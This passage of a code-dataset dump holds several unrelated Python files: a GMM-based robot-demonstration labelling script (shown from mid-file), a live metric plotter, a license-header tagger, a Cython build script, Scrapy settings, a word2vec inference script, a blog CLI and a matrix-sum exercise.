pi0[kk] = cluster['pi_k']\n        np.save(meanfile,mu0)\n        np.save(covarfile, cov0)\n        np.save(pifile,pi0)\n\n    def manual_labelling(self):\n        \"\"\"---------------------\n          Manual Labelling\n        ------------------------\"\"\"\n        # By manually labelling 1 run of data we extract a mean and cov to begin the iterations\n        print(\"-------> manual labelling of run1 \")\n        mu0 = np.zeros((n_primitives,N))\n        cov0 = np.zeros((n_primitives,N,N))\n        tlabels = np.genfromtxt(\"../data/pipe/raw_pipe/run1_tlabels\",dtype=float)\n        tlabels = np.insert(tlabels,0,0.0)\n        labels=[Pr(int(idx)) for idx in np.genfromtxt(\"../data/pipe/raw_pipe/run1_prmlabels\")]\n        for prim in [Pr.none, Pr.fsm, Pr.align, Pr.engage, Pr.screw, Pr.tighten]:\n            tpairs = []\n            for i in range(len(labels)):#collect different labels and time periods corresponding 
to this primitive\n if(labels[i] == prim):\n tpairs.append([tlabels[i],tlabels[i+1]])\n time, X = read_data1('../data/pipe/raw_pipe/run1', \n '../data/pipe/raw_pipe/bias.force',\n output_fmt='array',\n tpairlist=tpairs)\n #each row of X is an observation\n #each column of X is a variable\n mu0[prim.value] = np.mean(X[:,subset],axis=0)\n cov0[prim.value] = np.cov(X[:,subset],rowvar=False)\n return mu0,cov0\n\n def train(self, mu0, cov0, numIterTrain, transition, currentNumTupdates, time):\n \"\"\"---------------------\n Training\n ------------------------\"\"\" \n # Init \n likelihoods_fileName, tlabels_fileName, prmlabels_fileName, manual_tlabels, manual_prmlabels, success_fileName, failureFile = createFileNames(1,currentNumTupdates) \n self.initialize_clusters(n_primitives, means0=mu0, cov0=cov0, constraints=myConstraints)\n run = 1\n\n # Train by running gmm for \"run1\" of the demonstration data \n print(\"-------> training run1 \")\n for i in range(numIterTrain):\n if i == numIterTrain - 1: # save and plot likelihoods on the last iteration\n likelihoods_figName = \"figures/run1_likelihoods_epochs{0:d}_T{1:d}.png\".format(self.epoch, currentNumTupdates)\n self.expectation_step(\n run,\n t=time,\n # saveFigure = likelihoods_figName, \n saveFile=likelihoods_fileName,\n T_matrix_APF=transition)\n else: # T_matrix_APF implies that the expectation step is using an Augmented Particle Filter\n self.expectation_step(run, t=time, T_matrix_APF=transition)\n self.maximization_step()\n print(\"it: {0:d} likelihood function {1:e}\".format(i, self.get_likelihood()))\n \n # Save training data\n self.save('references/mean', 'references/covar', 'references/pi')\n\n # Print training results\n means = np.load('references/mean.npy')\n covar = np.load('references/covar.npy')\n \n # Save tlabels and prmlabels from likelihoods files \n getlabels(likelihoods_fileName, tlabelFile=tlabels_fileName, prlabelFile=prmlabels_fileName)\n \n # Compute. 
save and plot success rate\n success_rate = compute_success_rate(likelihoods_fileName, manual_tlabels, manual_prmlabels)\n saveSuccessRateFile(success_fileName, success_rate, currentNumTupdates)\n print(\"-------> training success_rate run1: {0:f}\".format(success_rate))\n \n\n def test(self, run_number, numIterTest, transition, currentNumTupdates, time):\n \"\"\"---------------------\n Testing\n ------------------------\"\"\"\n \"\"\" \n The following code will run iff you specify a run number on command line:\n python gmm.py [run_number]\n\n *note: a run is the raw sensor data corresponding to \n one human demonstration of the full task\n \"\"\"\n offset = 0.01\n success = False\n likelihoods_fileName, tlabels_fileName, prmlabels_fileName, manual_tlabels, manual_prmlabels, success_fileName, failureFile = createFileNames(run_number,currentNumTupdates)\n\n # Testing\n print(\"-------> testing on: \",testfile, \"-----------\")\n while not success and offset < 10000:\n success = True\n offset = offset*10\n print(\"offset: \", offset)\n self.offset = offset\n try:\n self.initialize_clusters_from_savedfiles(n_primitives, \n 'references/mean.npy', 'references/covar.npy', 'references/pi.npy',constraints=myConstraints)\n for i in range(numIterTest):\n if i == numIterTest - 1: # save and plot likelihoods on the last iteration\n likelihoods_figName = \"figures/run{0:d}_likelihoods_epochs{1:d}_T{2:d}.png\".format(run_number, self.epoch, currentNumTupdates)\n self.expectation_step(\n run_number,\n t=time,\n # saveFigure = likelihoods_figName,\n saveFile = likelihoods_fileName,\n T_matrix_APF=transition)\n else:\n self.expectation_step(run_number, t=time, T_matrix_APF=transition, saveFile = likelihoods_fileName)\n \n self.maximization_step()\n print(\"it: {0:d} likelihood function {1:e}\".format(i, self.get_likelihood()))\n \n except Exception as e:\n print(\"error: \", e)\n success = False\n\n # Save testing data\n self.save('references/meantest', 'references/covartest', 'references/pitest')\n\n # Print testing results\n means = np.load('references/meantest.npy')\n covar = np.load('references/covartest.npy')\n \n # Save tlabels and prmlabels from likelihoods files \n getlabels(likelihoods_fileName, tlabelFile=tlabels_fileName, prlabelFile=prmlabels_fileName)\n \n # # Compute, save and plot success rate\n # success_rate = compute_success_rate(likelihoods_fileName, manual_tlabels, manual_prmlabels)\n # saveSuccessRateFile(success_fileName, success_rate, currentNumTupdates)\n # print(\"-------> testing success_rate run{0:d}: {1:f}\".format(run_number, success_rate))\n \n\n\"\"\" --------------------------------------------------------------------------------------\n MAIN\n-----------------------------------------------------------------------------------------\"\"\"\n\"\"\" \n - Initialize:\n * create an array \"subset\" with the raw sensor data of interest\n * manually label one run (data from one human demo of the whole task) and extract \n a mean and cov based on the manual labelling to seed the gmm algorithm\n - Training:\n * train by running the gmm on run1 using the mean and cov from the \n manual labelling as seeds\n - Testing:\n * test on other runs using the mean and cov from the training as seeds \n\"\"\"\nif __name__ == \"__main__\":\n\n # Dictionary for the raw sensor data\n var_idxs = { \n 'pos_x' : 0,\n 'pos_y' : 1,\n 'pos_z' : 2,\n 'ori_x' : 3,\n 'ori_y' : 4,\n 'ori_z' : 5,\n 'vel_x' : 6,\n 'vel_y' : 7,\n 'vel_z' : 8,\n 'ang_vel_x' : 9,\n 'ang_vel_y' : 10,\n 'ang_vel_z' : 11,\n 'F_x' : 
12,\n 'F_y' : 13,\n 'F_z' : 14,\n 'M_x' : 15,\n 'M_y' : 16,\n 'M_z' : 17}\n\n # subset contains only the sensor data we are interested in: 3,4,6-17\n subset = np.hstack((np.arange(3, 5), np.arange(6,18)))\n \n # Reorder the dictionary according to data in subset\n for key, val in var_idxs.items():\n found_idxs = np.where(subset==val)[0]\n if found_idxs.size > 0:\n var_idxs[key] = found_idxs[0]\n else:\n var_idxs[key] = -1 # assign -1 in dictionary to the data that wasn't included in subset\n\n N = len(subset)\n\n \"\"\"\n TRAINING AND TESTING\n -- Labelling and training will run if and only if you don't pass any run numbers\n otherwise it will just test\n -- Cycle: \n 1) Manually label run1 to get mu0,cov0\n 2) Train on run1 using mu0, cov0 as seeds\n 3) Test on the rest of the runs\n 4) Update Transition Matrix based on all the labelled runs\n 5) Train on 1 and Test on the rest again\n 6) Repeat steps 4 and 5 for several iterations until labelling success wrt manually labelled runs improves\n \"\"\"\n myConstraints = initializeConstraints()\n\n for i in range(numTMatrixUpdates):\n\n # ------------------------\n # Train on run 1 \n # ------------------------\n time,X = read_data1('../data/pipe/raw_pipe/run1', \n output_fmt='array')#,t0=0.0, t1 = 18.0) #0 to 10.5 for cap\n \n # Init\n myGMM = GMM(X[:,subset])\n \n if i == 0:\n transition = initializeTransitionMatrix()\n # transition = initializeTransitionMatrix2Identity()\n # createSuccessRateFile(1,i)\n else: \n transition = updatedTransition\n\n # Run training gmm\n print(\">>>>>>>> TRAINING >>>>>>>>\")\n mu0,cov0 = myGMM.manual_labelling()\n myGMM.train(mu0, cov0, numIterTrain, transition, i, time)\n \n # --------------------------\n # Test on runs 2-19 \n # --------------------------\n for run_number in range(2, NUM_RUNS):\n \n # for the cap: run 11 is missing and 16 is shit\n # if run_number == 11 or run_number == 16:\n # continue\n testfile='../data/pipe/raw_pipe/run{0:d}'.format(run_number)\n time,X = read_data1(testfile, '../data/pipe/raw_pipe/bias.force',output_fmt='array')\n \n # Init\n mytestGMM = GMM(X[:,subset])\n \n if i == 0:\n transition = initializeTransitionMatrix(final=True)\n # transition = initializeTransitionMatrix2Identity()\n np.savetxt(\"transitions/T_0\", transition) \n # createSuccessRateFile(run_number,i)\n\n else: \n transition = updatedTransition\n\n # Run testing gmm\n print(\">>>>>>>> TESTING >>>>>>>>\") \n mytestGMM.test(run_number, numIterTest, transition, i, time)\n\n # Update Transition Matrix\n updatedTransition = updateTransitionMatrix(i) \n print(\">>>>>>>> T matrix Update #\"+str(i+1))\n tnum = i+1\n transitionFileName = \"transitions/T_{0:d}\".format(tnum)\n np.savetxt(transitionFileName, updatedTransition) \n\n \"\"\"\n FIGURES\n -- likelihood plots are created and saved inside \n the expectation_step called by train and test\n \"\"\"\n print(\">>>>>>>> PLOTS >>>>>>>>\")\n \n # ----------------------------------\n # Plot sensor data of labelled run \n # - for initial and final transition matrix\n # - for run2 (really good) and run12 (sucks)\n # - 4 plots \n lastT = numTMatrixUpdates - 1\n run2plot = [2, 12]\n # trans2plot = [0,lastT]\n trans2plot = 0\n\n for i in range(2): \n plot_file('../data/pipe/raw_pipe/run{0:d}'.format(run2plot[i]),\n tlabelfile=\"results/run{0:d}_tlabels_T{1:d}\".format(run2plot[i],trans2plot),\n prlabelfile=\"results/run{0:d}_prmlabels_T{1:d}\".format(run2plot[i],trans2plot)\n )\n plt.savefig(\"figures/labelled_run{0:d}_T{1:d}.png\".format(run2plot[i],trans2plot),dpi=600)\n 
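# A quick property check on the transition matrices written above: every row
# of a Markov transition matrix must stay a probability distribution
# (assumes training already wrote transitions/T_0 via np.savetxt):
import numpy as np

T_check = np.genfromtxt("transitions/T_0")
assert np.allclose(T_check.sum(axis=1), 1.0), "each row of T must sum to 1"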
# plt.show()\n plt.close()\n\n # for i in range(2): \n # for t in range(2):\n # plot_file('../data/pipe/raw_pipe/run{0:d}'.format(run2plot[i]),\n # tlabelfile=\"results/run{0:d}_tlabels_T{1:d}\".format(run2plot[i],trans2plot[t]),\n # prlabelfile=\"results/run{0:d}_prmlabels_T{1:d}\".format(run2plot[i],trans2plot[t]),\n # tlabelfileTruth='../data/pipe/raw_pipe/run{0:d}_tlabels'.format(run2plot[i]),\n # prlabelfileTruth='../data/pipe/raw_pipe/run{0:d}_prmlabels'.format(run2plot[i])\n # )\n # plt.savefig(\"figures/labelled_run{0:d}_T{1:d}.png\".format(run2plot[i],trans2plot[t]),dpi=600)\n # # plt.show()\n # plt.close()\n\n # # ----------------------------------\n # # Plot success_rate vs. #Tmatrix_updates \n # # - legend: average success rate, success run2, success run12\n # success_a = np.genfromtxt(\"results/run{0:d}_successRates\".format(run2plot[0]),skip_header=1)\n # success_a = success_a[:,1]\n # success_b = np.genfromtxt(\"results/run{0:d}_successRates\".format(run2plot[1]),skip_header=1)\n # success_b = success_b[:,1]\n # Tupdate = np.arange(0,numTMatrixUpdates,1)\n\n # success_sum = np.zeros(numTMatrixUpdates)\n # success_sum_prev = np.zeros(numTMatrixUpdates)\n # for i in range(1,NUM_RUNS):\n # if i == 11 or i == 16:\n # continue\n # success = np.genfromtxt(\"results/run{0:d}_successRates\".format(i),skip_header=1)\n # success = success[:,1]\n # success_sum = success_sum + success\n # success_avg = success_sum/(NUM_RUNS-1)\n\n # plt.plot(Tupdate, success_a, label = 'run{0:d}'.format(run2plot[0]))\n # plt.plot(Tupdate, success_b, label = 'run{0:d}'.format(run2plot[1]))\n # plt.plot(Tupdate, success_avg, label = 'avg')\n # ax = plt.gca()\n # ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n # plt.ylabel('success')\n # plt.xlabel('update number')\n # plt.title('Success vs. 
T_matrix Updates')\n # plt.legend()\n # plt.savefig('figures/success_vs_T.png', dpi=600)\n # # plt.show()\n # plt.close()\n\n # # ----------------------------------\n # # Plot Transition Matrix values convergence \n\n # # ------ 1) Diagonal values (legend with 6 numbers)\n # plt.subplot(211)\n # # Tdiag: each row has the 6 diagonal elements of one T matrix\n # # each column is the evolution of an element through the iterations\n # Tdiag = np.zeros((numTMatrixUpdates, n_primitives)) \n # for i in range(numTMatrixUpdates):\n # T = np.genfromtxt(\"transitions/T_{0:d}\".format(i))\n # Tdiag[i,:] = T.diagonal() # the 6 diagonal elements \n # Tupdate = np.arange(0,numTMatrixUpdates,1)\n\n # for i in range(n_primitives):\n # plt.plot(Tupdate, Tdiag[:,i], label = 'T[{0:d},{1:d}]'.format(i+1,i+1))\n # ax1 = plt.gca()\n # ax1.xaxis.set_major_locator(MaxNLocator(integer=True))\n # # plt.xlabel('update number')\n # plt.ylabel('diagonal values')\n # ax1.title.set_text('T Matrix Convergence: Diagonal Elements')\n # # plt.savefig('figures/T_diag_convergence.png', dpi=600)\n # plt.legend(loc=3, prop={'size': 6})\n\n # # ------ 2) 2norm of the difference between successive Ts\n # plt.subplot(212)\n # # Tdiff: frobenious norm of the difference between consecutive Ts\n # Tdiff = np.zeros(numTMatrixUpdates-1) \n # for i in range(numTMatrixUpdates-1):\n # T = np.genfromtxt(\"transitions/T_{0:d}\".format(i))\n # Tnext = np.genfromtxt(\"transitions/T_{0:d}\".format(i+1))\n # Tdiff[i] = np.sqrt((np.linalg.norm(T-Tnext, 'fro')/36))\n # Tupdate = np.arange(1,numTMatrixUpdates,1)\n # plt.plot(Tupdate, Tdiff)\n # ax2 = plt.gca()\n # ax2.xaxis.set_major_locator(MaxNLocator(integer=True))\n # plt.xlabel('update number')\n # plt.ylabel('change in T values')\n # ax2.title.set_text('T Matrix Convergence: $||T_{i+1} - T_i||_{FRO}$')\n # plt.tight_layout()\n # plt.savefig('figures/T_convergence.png', dpi=600)\n # plt.show()\n # plt.close()\n\n # ----------------------------------\n # Plot confusion matrix \n\n print(\"---------- FIN -------------\")\n","sub_path":"analysis/gmm_pipe.py","file_name":"gmm_pipe.py","file_ext":"py","file_size_in_byte":39227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"110522084","text":"import argparse\nimport re\nimport sys\nimport time\nfrom collections import defaultdict\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom _math import plt_pause\n\n\ndef plot_time_series(metric_regex, samples=500):\n plt.style.use(\"bmh\")\n\n # Setup ESC key to exit live plot\n request_exit = False\n\n def key_pressed(event):\n nonlocal request_exit\n\n if event.key == \"escape\":\n request_exit = True\n\n fig, _ = plt.subplots()\n fig.canvas.mpl_connect(\"key_press_event\", key_pressed)\n plt.show(block=False)\n\n data = defaultdict(list)\n frame_index = 0\n\n last_update = 0.0\n\n while True:\n line = sys.stdin.readline()\n if line == \"\":\n break\n else:\n line = line.rstrip(\"\\n\")\n\n if request_exit:\n break\n\n for name, patt in metric_regex.items():\n match = re.findall(patt, line)\n if match:\n val = float(match[0])\n data[name].append(val)\n frame_index = len(data[name]) + 1\n\n now = time.time()\n if now - last_update > 0.5:\n plt.cla()\n for name, ys in data.items():\n maxsize = min(len(ys), samples)\n plt.plot(\n np.arange(frame_index, frame_index + maxsize),\n ys[-samples:],\n label=name,\n )\n\n plt.legend()\n plt.ylim(bottom=-2, top=10)\n plt_pause(0.01)\n last_update = now\n\n plt.close()\n\n 
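# How the METRIC=REGEX pairs parsed below are applied to a log line, in
# isolation (the sample line and metric name are illustrative):
import re

metric_regex_demo = {"loss": re.compile(r"loss=([0-9.]+)")}
for name, patt in metric_regex_demo.items():
    match = re.findall(patt, "step 42 loss=0.731")
    if match:
        print(name, float(match[0]))   # -> loss 0.731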
print(\"Live plot closed.\")\n\n df = pd.DataFrame.from_dict(data, orient=\"index\")\n df = df.transpose()\n df.to_csv(\"data.csv\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--metric\",\n \"-m\",\n metavar=\"METRIC=REGEX\",\n nargs=\"+\",\n help=\"Provide both the name and regular expression to match the metric.\",\n )\n args = parser.parse_args()\n\n metric_regex = {\n m.split(\"=\", 1)[0]: re.compile(m.split(\"=\", 1)[1]) for m in args.metric\n }\n plot_time_series(metric_regex=metric_regex)\n","sub_path":"scripts/r/live_plot.py","file_name":"live_plot.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"632773365","text":"#!/usr/bin/env python \n# -*- python -*-\n#BEGIN_LEGAL\n#\n#Copyright (c) 2016 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# \n#END_LEGAL\nfrom __future__ import print_function\nimport sys\nimport os\nimport re\nfrom stat import *\n\n\ndef _get_mode(fn):\n \"get the mode of the file named fn, suitable for os.chmod() or open() calls\"\n mode = os.stat(fn)[ST_MODE]\n cmode = S_IMODE(mode)\n return cmode\n\ndef _replace_original_with_new_file(file,newfile):\n \"Replace file with newfile\"\n # os.system(\" mv -f %s %s\" % ( newfile, file))\n os.unlink(file)\n os.rename(newfile,file)\n\ndef _remove_existing_header(contents,prefix=\"#\"):\n \"remove existing legal header, if any\"\n retval = []\n skipping = False\n start_pattern = re.compile(r\"^(/[*]BEGIN_LEGAL)|(\" + prefix + \"BEGIN_LEGAL)\")\n stop_pattern = re.compile(r\"^[ ]*(END_LEGAL[ ]?[*]/)|(\" + prefix + \"[ ]*END_LEGAL)\")\n for line in contents:\n if start_pattern.match(line):\n skipping = True\n if skipping == False:\n retval.append(line)\n if stop_pattern.match(line):\n skipping = False\n return retval\n\ndef _prepend_script_comment(header,prefix=\"#\"):\n \"Apply script comment marker to each line\"\n retval = []\n for line in header:\n retval.append( prefix + line )\n return retval\n\ndef apply_header_to_source_file(header, file):\n \"apply header to file using C++ comment style\"\n f = open(file,\"r\")\n mode = _get_mode(file)\n contents = f.readlines()\n f.close()\n trimmed_contents = _remove_existing_header(contents)\n newfile = file + \".new\"\n o = open(newfile,\"w\")\n o.write(\"/*BEGIN_LEGAL \\n\")\n o.writelines(header)\n o.write(\"END_LEGAL */\\n\")\n o.writelines(trimmed_contents)\n o.close()\n os.chmod(newfile,mode)\n _replace_original_with_new_file(file,newfile)\n\n# FIXME: this will flag files that have multiline C-style comments\n# with -*- in them even though the splitter will not look for the\n# comment properly\n\ndef _shell_script(lines):\n \"\"\"return true if the lines are the start of shell script or\n something that needs a mode comment at the top\"\"\"\n \n first = \"\"\n second = \"\"\n if len(lines) > 0:\n first = lines[0];\n if len(lines) > 1:\n second = lines[1];\n \n if re.match(\"#!\",first):\n return 
True\n if re.search(\"-\\*-\",first) or re.search(\"-\\*-\",second):\n return True\n return False\n\ndef _split_script(lines):\n \"Return a tuple of (header, body) for shell scripts, based on an input line list\"\n header = []\n body = []\n\n f = lines.pop(0)\n while re.match(\"#\",f) or re.search(\"-\\*-\",f):\n header.append(f)\n f = lines.pop(0)\n\n # tack on the first non matching line from the above loop\n body.append(f);\n body.extend(lines);\n return (header,body)\n\ndef _write_script_header(o,lines,prefix=\"#\"):\n \"Write the file header for a script\"\n o.write(prefix+\"BEGIN_LEGAL\\n\")\n o.writelines(lines)\n o.write(prefix+\"END_LEGAL\\n\")\n \ndef apply_header_to_data_file(header, file, prefix=\"#\"):\n \"apply header to file using script comment style\"\n f = open(file,\"r\")\n mode = _get_mode(file)\n contents = f.readlines()\n f.close()\n trimmed_contents = _remove_existing_header(contents, prefix)\n newfile = file + \".new\"\n o = open(newfile,\"w\")\n augmented_header = _prepend_script_comment(header,prefix)\n if _shell_script(trimmed_contents):\n (script_header, script_body) = _split_script(trimmed_contents)\n o.writelines(script_header)\n _write_script_header(o, augmented_header, prefix)\n o.writelines(script_body)\n else:\n _write_script_header(o,augmented_header,prefix)\n o.writelines(trimmed_contents)\n o.close()\n os.chmod(newfile,mode)\n _replace_original_with_new_file(file,newfile)\n\n####################################################################\n### MAIN\n####################################################################\nif __name__ == '__main__':\n if len(sys.argv) < 4:\n print (\"Usage \" + sys.argv[0] + \" [-s|-t] legal-header file-name [file-name...]\\n\")\n sys.exit(1)\n\n type = sys.argv[1]\n header_file = sys.argv[2]\n if not os.path.exists(header_file):\n print (\"Could not find header file: [%s]\\n\" % (header_file))\n sys.exit(1)\n\n files_to_tag = sys.argv[3:]\n f = open(header_file,\"r\")\n header = f.readlines()\n f.close()\n\n sources = files_to_tag\n\n if type == \"-s\":\n for file in sources:\n if re.search(\".svn\",file) == None and re.search(\".new$\",file) == None:\n apply_header_to_source_file(header, file.strip())\n elif type == \"-t\":\n for file in sources:\n if re.search(\".svn\",file) == None and re.search(\".new$\",file) == None:\n apply_header_to_data_file(header, file.strip())\n else:\n print (\"2nd argument must be -s or -t\\n\")\n sys.exit(1)\n","sub_path":"mbuild/header_tag.py","file_name":"header_tag.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"559674853","text":"#======== setup.py ===========\nfrom distutils.core import setup\nfrom Cython.Build import cythonize\n\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\nimport subprocess\nimport numpy\n\nproc_libs = subprocess.check_output(\"pkg-config --libs eigen3 egl glew pcl_io-1.8\".split())\nproc_incs = subprocess.check_output(\"pkg-config --cflags eigen3 egl glew pcl_io-1.8\".split())\n\nlibs = [lib.encode('utf-8') for lib in proc_libs.split()]\nincs= [inc.encode('utf-8') for inc in proc_incs.split()]\nincs_new = []\nfor inc in incs:\n if '-I' in inc:\n inc = inc[2:]\n incs_new.append(inc)\n\nincs = incs_new\nincs = incs + [numpy.get_include()]\nlibs = libs + ['-lboost_system']\n\nsetup(\n cmdclass = {'build_ext': build_ext},\n ext_modules = cythonize(Extension(\"projector\",\n sources = [\"projector.pyx\"],\n language = \"c++\",\n 
include_dirs=incs,\n                                      extra_link_args=libs\n                                      )\n                            )\n)\n","sub_path":"self_localization/renderer/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"508758158","text":"# -*- coding: utf-8 -*-\n\n# Scrapy settings for domain_com project\n#\n# For simplicity, this file contains only settings considered important or\n# commonly used. You can find more settings consulting the documentation:\n#\n#     https://doc.scrapy.org/en/latest/topics/settings.html\n#     https://doc.scrapy.org/en/latest/topics/downloader-middleware.html\n#     https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n\nBOT_NAME = 'domain_com'\n\nSPIDER_MODULES = ['domain_com.spiders']\nNEWSPIDER_MODULE = 'domain_com.spiders'\n\n\n\nCOOKIES_ENABLED = False\nDOWNLOAD_DELAY = .5\nCONCURRENT_REQUESTS = 20\nCONCURRENT_REQUESTS_PER_DOMAIN = 1\n\nDOWNLOAD_TIMEOUT = 30\n\n# DOWNLOAD_DELAY = .1 # Autothrottle never goes below this value and so we have to set it to low\n# AUTOTHROTTLE_ENABLED = True\n# AUTOTHROTTLE_DEBUG = True\n# AUTOTHROTTLE_MAX_DELAY = 10.0\n# AUTOTHROTTLE_TARGET_CONCURRENCY = 1\n\nDOWNLOADER_MIDDLEWARES = {\n    'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware' : None,\n}\n# FEED_URI=\"/home/domain.csv\"\n#\n# FEED_EXPORTERS = {\n#     'csv': 'scrapy.contrib.exporter.CsvItemExporter',\n# }\nFEED_FORMAT = 'csv'","sub_path":"domain_com/domain_com/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"270809853","text":"import pandas as pd\r\nfrom keras.models import load_model\r\nfrom keras.preprocessing.sequence import pad_sequences\r\nimport joblib\r\n\r\nmodelPath = \"F:/IndustryProject/word2vec_model.h5\"\r\ntokenizerPath = \"F:/IndustryProject/word2vec_tokenizer.pkl\"\r\nscalarPath = \"F:/IndustryProject/word2vec_scaler.pkl\"\r\nfilePath = \"F:/IndustryProject/PickleDataCountV8\"\r\n\r\nmodel = load_model(modelPath)\r\ntokenizer = joblib.load(tokenizerPath)\r\nscaler = joblib.load(scalarPath)\r\ndf = pd.read_pickle(filePath)\r\n\r\n\r\ninputVectors = tokenizer.texts_to_sequences(df['Text'])\r\ninputVectors = pad_sequences(inputVectors, padding='post', maxlen=8906)\r\noutput = model.predict(inputVectors)\r\ndf['Predicted'] = scaler.inverse_transform(output)\r\n\r\ndf[['Path', 'WordCount', 'CharCount', 'StopWords', 'Sentence', 'Predicted']].to_csv(\"F:/IndustryProject/TestingWord2Vec.csv\")","sub_path":"Python/Processing/TestWord2Vec.py","file_name":"TestWord2Vec.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"27554395","text":"import mot\nimport os\nimport argparse\nimport collections\nfrom http.server import HTTPServer, SimpleHTTPRequestHandler\n\nclass InitAction(argparse.Action):\n    def __init__(self, **kwargs):\n        super(InitAction, self).__init__(**kwargs)\n\n    def __call__(self, parser, namespace, values, option_strings=None):\n        # print('{} {} {}'.format(namespace, values, option_strings))\n        cfg = collections.OrderedDict()\n        cfg['sitename'] = input('site name>') or 'Untitled'\n        cfg['payoff'] = input('site payoff>') or 'Payoff'\n        cfg['author'] = input('site owner>') or 'anonymuse'\n        cfg['theme'] = input('theme>') or 'default'\n        cfg['github'] = 'https://github.com/{}'.format(input('github>'))\n        cfg['twitter'] = 'https://twitter.com/{}'.format(input('twitter>'))\n        mot.bootstrap(cfg)\n\nclass BuildAction(argparse.Action):\n    def __init__(self, **kwargs):\n        super(BuildAction, self).__init__(**kwargs)\n    \n    def __call__(self, parser, namespace, values, option_strings=None):\n        mot.Theme().build()\n\nclass ServerAction(argparse.Action):\n    def __init__(self, **kwargs):\n        super(ServerAction, self).__init__(**kwargs)\n    \n    def __call__(self, parser, namespace, values, option_strings=None):\n        os.chdir(mot.DIST_PATH)\n        server_address = ('', 8000)\n        httpd = HTTPServer(server_address, SimpleHTTPRequestHandler)\n        httpd.serve_forever()\n\nclass PostNew(argparse.Action):\n    def __init__(self, **kwargs):\n        super(PostNew, self).__init__(**kwargs)\n\n    def __call__(self, parser, namespace, values, option_strings=None):\n        print('{} {} {}'.format(namespace, values, option_strings))\n        if type(namespace.__dict__['title']) == list:\n            title = ' '.join(namespace.__dict__['title'])\n        else:\n            title = namespace.__dict__['title']\n        post = mot.Post()\n        post.set_title(title)\n        post.set_date()\n        post.save()\n\nparser = argparse.ArgumentParser(mot.__description__)\nsubparsers = parser.add_subparsers(help='pending')\n\nparser2 = subparsers.add_parser('init', help='%(prog)s initialize new blog')\nparser2.add_argument('run', nargs=0, action=InitAction, help=argparse.SUPPRESS)\n\nprsr = subparsers.add_parser('build', help='%(prog)s build new blog')\nprsr.add_argument('run', nargs=0, action=BuildAction, help=argparse.SUPPRESS)\n\nprsr = subparsers.add_parser('server', help='%(prog)s build new blog')\nprsr.add_argument('run', nargs=0, action=ServerAction, help=argparse.SUPPRESS)\n\nprsr = subparsers.add_parser('post', help='post management')\nprsr.add_argument('new', nargs=1)\nprsr.add_argument('title', nargs='+', type=str)\nprsr.add_argument('--author', nargs='*', type=str)\nprsr.add_argument('--date', nargs='*', type=str)\nprsr.add_argument('run', nargs=0, action=PostNew, help='new post')\n\nargs = parser.parse_args()\n\n","sub_path":"mot/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
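str.format on a string without a {} placeholder returns the string unchanged, which is why the GitHub and Twitter prompts in cli.py above need the placeholder to keep the user's input. A two-line illustration of the pitfall and the fix:

assert 'https://github.com/'.format('alice') == 'https://github.com/'          # input discarded
assert 'https://github.com/{}'.format('alice') == 'https://github.com/alice'   # placeholder keeps it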
{"seq_id":"37230004","text":"# Write an algorithm that reads a matrix M[3][4]. Compute and show the sum of\n# the values contained in the second row.\n\nm=[[0 for c in range(4)] for l in range(3)]\nfor l in range(3):\n    for c in range(4):\n        m[l][c]=int(input('Enter: '))\nacum=0\nfor c in range(4):\n    acum+=m[1][c]\nprint('Sum:',acum)","sub_path":"exercicio 43 - Matriz.py","file_name":"exercicio 43 - Matriz.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
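In nested list comprehensions the inner loop builds a single row, so the row count belongs to the outer loop; with the two ranges swapped, the later m[1][c] access for c up to 3 would raise IndexError. A quick shape check:

m = [[0 for c in range(4)] for l in range(3)]
assert len(m) == 3 and len(m[0]) == 4   # 3 rows of 4 columns, so m[1][3] is valid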
Calcular e mostrar o somatório dos\n#valores contidos na segunda linha.\n\nm=[[0 for i in range(4)]for i in range(3)] #3 linhas x 4 colunas, conforme os laços abaixo\nfor l in range(3):\n    for c in range(4):\n        m[l][c]=int(input('Digite: '))\nacum=0\nfor c in range(4):\n    acum+=m[1][c]\nprint('Somatorio:',acum)","sub_path":"exercicio 43 - Matriz.py","file_name":"exercicio 43 - Matriz.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
